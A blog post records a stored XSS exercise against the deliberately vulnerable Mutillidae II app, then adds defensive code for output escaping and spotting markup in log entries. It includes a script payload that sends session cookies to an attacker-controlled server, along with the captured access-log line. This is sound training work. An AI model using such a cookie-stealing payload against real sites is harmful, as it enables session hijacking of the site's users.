About this blog

I'm a developer with over 10 years' experience who wants to transition to infosec. This blog is an informal record of my experiments with OWASP's Mutillidae II, a web application exhibiting a multitude of deliberate vulnerabilities. I will also take Offensive Security's PWK training course and get the OSCP certificate.

Wednesday, 31 August 2016

Stored XSS vulnerability in log viewer

The log contains attempted login entries like this:

User foobar attempting to authenticate

The log is viewed as an HTML table, so we can try to inject some script in the username field.

<script>alert('hello');</script>

Now when we view the log:

Something more interesting:

<script>alert(document.cookie)</script>

An attacker would instead silently send the cookie somewhere they could pick it up later:

<script>new Image().src = "http://localhost/?" + encodeURIComponent(document.cookie)</script>

On the attacker-controlled server:

$ tail -f access.log
::1 - - [31/Aug/2016:06:38:31 -0400] "GET /?showhints%3D1%3B%20PHPSESSID%3Dq5p2do7c17d64sfj5bvuem2si1 HTTP/1.1" 302 -

The attacker will hope to get the admin's cookie when the admin next views the logs webpage.

Of course, stealing a session cookie is only one application of an XSS. The "XSS Payloads" website has a library of scary payloads that can take screenshots, keylog, remotely control the browser, attempt to turn on your webcam and more.
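As an added, defender-side example (my own code, not Mutillidae's): the log-to-table rendering done the vulnerable way and with output encoding, plus a check that flags stored entries carrying markup. The function names and the sample log entries are assumptions constructed for the demonstration.

```javascript
// Added example, not Mutillidae's code: render the authentication log as an
// HTML table so that a stored username such as
// <script>alert(document.cookie)</script> is shown as text, not executed.
// The entries below are constructed for this demonstration.
const sampleLog = [
  'User foobar attempting to authenticate',
  'User <script>alert(document.cookie)</script> attempting to authenticate',
  'User <img src=x onerror="alert(1)"> attempting to authenticate',
];

// Encode the five characters that matter in HTML text and attribute context.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The vulnerable pattern: log text concatenated straight into the markup,
// which is what makes the stored payload run when an admin views the page.
function renderLogVulnerable(entries) {
  const rows = entries.map((e) => `<tr><td>${e}</td></tr>`).join('');
  return `<table>${rows}</table>`;
}

// The hardened version: every entry is encoded at output time, so the
// browser renders the angle brackets literally and never sees a script tag.
function renderLogSafe(entries) {
  const rows = entries.map((e) => `<tr><td>${escapeHtml(e)}</td></tr>`).join('');
  return `<table>${rows}</table>`;
}

// Defender's check: entries that contain a tag-like token are a sign that
// someone is feeding HTML through the username field, worth alerting on.
function findSuspiciousEntries(entries) {
  return entries.filter((e) => /<\s*\/?\s*[a-z]/i.test(e));
}
```

Escaping at output time is the actual fix; setting the HttpOnly flag on the session cookie additionally keeps document.cookie from revealing it, though it does nothing against the other payload types mentioned above.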
